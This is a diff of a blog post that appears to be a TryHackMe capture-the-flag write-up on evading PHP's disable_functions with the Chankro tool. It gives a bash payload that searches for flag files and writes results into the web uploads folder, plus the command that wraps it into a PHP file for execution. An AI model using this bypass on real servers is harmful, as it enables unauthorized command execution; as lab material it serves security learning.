timsonner/sveltekit-markdown-blog/blog/src/routes/blog/thm-bdf.md

 ## We are presented with phpinfo()
 ![](/thm-bdf/thm-bdf-phpinfo.png)

-Take a look at the disabled_functions and DOCUMENT_ROOT.
-The disabled_functions tell us we can't use many PHP functions.
+Take a look at the disabled_functions and DOCUMENT_ROOT envir0nment variables.
+The disabled_functions var tells us we can't use many of the classic PHP payload functions.
 We must resort to using other means.

 ## Download and install Chankro
 https://github.com/TarlogicSecurity/Chankro/tree/master

-## Generate bash payload (c.sh) using your favorite flavor of text editor or echo
+## Generate bash payload (c.sh) using your favorite flavor of text editor or echo.
+Modify the filepath using CONTEXT_DOCUMENT_ROOT
 ```bash
 #! /bin/bash
 find / flag*.txt > /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/flag-location.txt
 #cat /path/to/flag/flag.txt > /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/flag.txt
 ```

-## Excute chankro command using the path in CONTEXT_DOCUMENT_ROOT as an argument to generate a .php file (don't forget /uploads/)
+## Ex3cute chankro command using the path in CONTEXT_DOCUMENT_ROOT as an argument to generate a .php file
 ```
 python2 chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads/
 ```